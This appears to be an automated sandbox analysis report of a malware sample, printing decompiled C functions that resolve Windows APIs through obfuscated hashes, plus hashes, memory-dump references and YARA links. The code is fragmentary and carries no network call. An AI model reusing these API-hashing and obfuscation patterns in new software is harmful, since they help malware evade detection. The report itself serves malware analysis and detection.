                                              • Instruction ID: 2eb6e950e08b54ec22570880898c2c29c86647912668cb224e3a70f5a3ecf71b
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: 6B11B372911148FBDF199F96DC4ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0026B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E0026B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0026602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002707A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x0026b569
                                              0x0026b56a
                                              0x0026b56d
                                              0x0026b572
                                              0x0026b574
                                              0x0026b577
                                              0x0026b57a
                                              0x0026b57d
                                              0x0026b580
                                              0x0026b583
                                              0x0026b586
                                              0x0026b587
                                              0x0026b58a
                                              0x0026b58d
                                              0x0026b590
                                              0x0026b593
                                              0x0026b594
                                              0x0026b595
                                              0x0026b59a
                                              0x0026b5a4
                                              0x0026b5b8
                                              0x0026b5c0
                                              0x0026b5c4
                                              0x0026b5cb
                                              0x0026b5d2
                                              0x0026b5d9
                                              0x0026b5e6
                                              0x0026b5fd
                                              0x0026b604

                                              APIs
                                              • CreateFileW.KERNELBASE(00270668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00270668,?,?,?,?), ref: 0026B5FD
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 0327fafa4b4c3a5ec02fc6d5cb4461bd8a6135eb87ede52e0eb147eb3951bf6b
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 4511B272801248BBDF16DF95DD46CEE7F7AFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0027981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E0027981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0026602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002707A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x00279821
                                              0x00279822
                                              0x00279825
                                              0x00279828
                                              0x0027982a
                                              0x0027982c
                                              0x0027982f
                                              0x00279832
                                              0x00279835
                                              0x00279836
                                              0x00279837
                                              0x0027983c
                                              0x00279855
                                              0x00279858
                                              0x0027985f
                                              0x00279866
                                              0x0027986d
                                              0x00279874
                                              0x0027987b
                                              0x0027988e
                                              0x0027989b
                                              0x002798a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002687F2,0000CAAE,0000510C,AD82F196), ref: 0027989B
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: 5ff70694106fec75d80ebbbb1fc180c58c74414d7dc3a8793abe3622122be630
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 4F015A76801208FBDB08EFD5DC46CDFBF79EF85750F108199F918A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00277BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E00277BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002707A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x00277bf7
                                              0x00277bf8
                                              0x00277bfa
                                              0x00277bfd
                                              0x00277bff
                                              0x00277c02
                                              0x00277c06
                                              0x00277c07
                                              0x00277c0f
                                              0x00277c1d
                                              0x00277c25
                                              0x00277c2d
                                              0x00277c31
                                              0x00277c38
                                              0x00277c3f
                                              0x00277c46
                                              0x00277c4a
                                              0x00277c5e
                                              0x00277c67
                                              0x00277c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00277C67
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: 15bede7b27f3bd786a82ece23fb7067232dc6edd6d3e6f87bcb0e367fa32a5e8
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: B8014FB190120CFFEB09DF94CC4A8DEBBB9EF44314F108198F40567240E6B15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0026F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E0026F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002707A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x0026f662
                                              0x0026f663
                                              0x0026f665
                                              0x0026f668
                                              0x0026f66a
                                              0x0026f66d
                                              0x0026f670
                                              0x0026f673
                                              0x0026f677
                                              0x0026f678
                                              0x0026f67d
                                              0x0026f687
                                              0x0026f693
                                              0x0026f69a
                                              0x0026f6a1
                                              0x0026f6a5
                                              0x0026f6a9
                                              0x0026f6b0
                                              0x0026f6c9
                                              0x0026f6d8
                                              0x0026f6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0026F6D8
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 1418f5eaa3fe879dfa5cd0ed18178fc83abf0b6380ca8bfaeba733e2abfab5c9
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 1B01E5B6901208BBEF059F94DC4A8DF7F79EB05324F148188F90462250D6B25E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0026B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0026B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0026602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002707A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x0026b6f3
                                              0x0026b6f8
                                              0x0026b702
                                              0x0026b70b
                                              0x0026b712
                                              0x0026b719
                                              0x0026b720
                                              0x0026b727
                                              0x0026b72e
                                              0x0026b747
                                              0x0026b759
                                              0x0026b75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0026B759
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 4dd1523c19ab64ff83871dcd57a5abbbe39d3232c1b981a46ec92c34d3210dea
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 3A018BB294030CFBEF45DF94DD06E9E7BB5EF08704F108188FA09261A0D3B25E20AB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0027AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0027AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002707A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x0027aa3f
                                              0x0027aa40
                                              0x0027aa41
                                              0x0027aa44
                                              0x0027aa47
                                              0x0027aa4b
                                              0x0027aa4c
                                              0x0027aa51
                                              0x0027aa5b
                                              0x0027aa64
                                              0x0027aa68
                                              0x0027aa6f
                                              0x0027aa76
                                              0x0027aa8d
                                              0x0027aa90
                                              0x0027aa9d
                                              0x0027aaa8
                                              0x0027aaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0027AAA8
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 76c1544a4b2e17f3600b46830ed426b8e0d57605eb32c033d05d0f5b3cce230d
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 33F069B191020CFFDF08DF94DD4A89EBFB8EB40304F108098F805A6250D3B29B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00265FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E00265FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002707A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x00265fb5
                                              0x00265fb6
                                              0x00265fb7
                                              0x00265fbb
                                              0x00265fbc
                                              0x00265fc1
                                              0x00265fcb
                                              0x00265fd7
                                              0x00265fde
                                              0x00265fe5
                                              0x00265ffc
                                              0x00265fff
                                              0x00266006
                                              0x0026600d
                                              0x0026601a
                                              0x00266025
                                              0x0026602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00266025
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 8702fe4290028545d28765235ed1e57b8eda292c2976730f66d1e1bcb90d30de
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: A5F04FB0C11208FFDB08DFA4ED4689EBFB8EB40300F208198E409A7260E7715F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 3020 Parent PID: 2968 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 006B2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E006B2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E006B602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E006C07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x006b295f
                                              0x006b2964
                                              0x006b2967
                                              0x006b296a
                                              0x006b296d
                                              0x006b296e
                                              0x006b296f
                                              0x006b2977
                                              0x006b2985
                                              0x006b298a
                                              0x006b2992
                                              0x006b299a
                                              0x006b29a2
                                              0x006b29a9
                                              0x006b29b0
                                              0x006b29b7
                                              0x006b29bb
                                              0x006b29cf
                                              0x006b29dc
                                              0x006b29e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006B29DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 87ca6e28325270c0f8dd1ab884993b8c649cbaf164d026b19b9ecf187a5ecf5e
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 95015B72A00108BBEB18DF95DC0A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006BC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E006BC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E006B602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E006C07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x006bc6e1
                                              0x006bc6e6
                                              0x006bc6f0
                                              0x006bc6fc
                                              0x006bc703
                                              0x006bc706
                                              0x006bc70d
                                              0x006bc711
                                              0x006bc715
                                              0x006bc71c
                                              0x006bc723
                                              0x006bc72a
                                              0x006bc731
                                              0x006bc738
                                              0x006bc751
                                              0x006bc762
                                              0x006bc768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006BC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: e7f4bfcbdc865569de5dcd09002db090fadf255c61100a79e6c09435298ededf
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 5F1133B290122DBBCB25DF95DD498EFBFB9EF04714F108188F90962210D3714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006B1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E006B1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006B602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E006C07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x006b1006
                                              0x006b1009
                                              0x006b100c
                                              0x006b1011
                                              0x006b1016
                                              0x006b101d
                                              0x006b1026
                                              0x006b102d
                                              0x006b1034
                                              0x006b103b
                                              0x006b1047
                                              0x006b104f
                                              0x006b1057
                                              0x006b105e
                                              0x006b1065
                                              0x006b106c
                                              0x006b1073
                                              0x006b1077
                                              0x006b108b
                                              0x006b1096
                                              0x006b109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 006B1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: ab4fc85dc399104e026c2bade10430990369dfb79d1228360e41937a9a87d5b4
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: 08015BB6D01308FBEF44DF94C94AADEBBB1EB54318F10818CE41466291D3B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006B4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E006B4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E006C07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x006b485e
                                              0x006b487a
                                              0x006b487d
                                              0x006b4884
                                              0x006b488b
                                              0x006b4892
                                              0x006b489d
                                              0x006b48a0
                                              0x006b48ad
                                              0x006b48b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 006B48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 88ef9516657f620cb2a370b262f7f9a5b39f166d95ce1f86fc1797b35307a812
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: E5F01D70905209FBDB44CFE8C95699EBFB5EB40301F20818CE444B7290E3715F509B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006C4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E006C4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006B602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E006C07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x006c4f80
                                              0x006c4f81
                                              0x006c4f82
                                              0x006c4f86
                                              0x006c4f87
                                              0x006c4f8c
                                              0x006c4fa5
                                              0x006c4fa8
                                              0x006c4faf
                                              0x006c4fb6
                                              0x006c4fc7
                                              0x006c4fca
                                              0x006c4fd7
                                              0x006c4fe2
                                              0x006c4fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 006C4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.2123517027.00000000006B1000.00000020.00000001.sdmp, Offset: 006B0000, based on PE: true
                                              • Associated: 0000000E.00000002.2123509123.00000000006B0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000E.00000002.2123538577.00000000006CC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
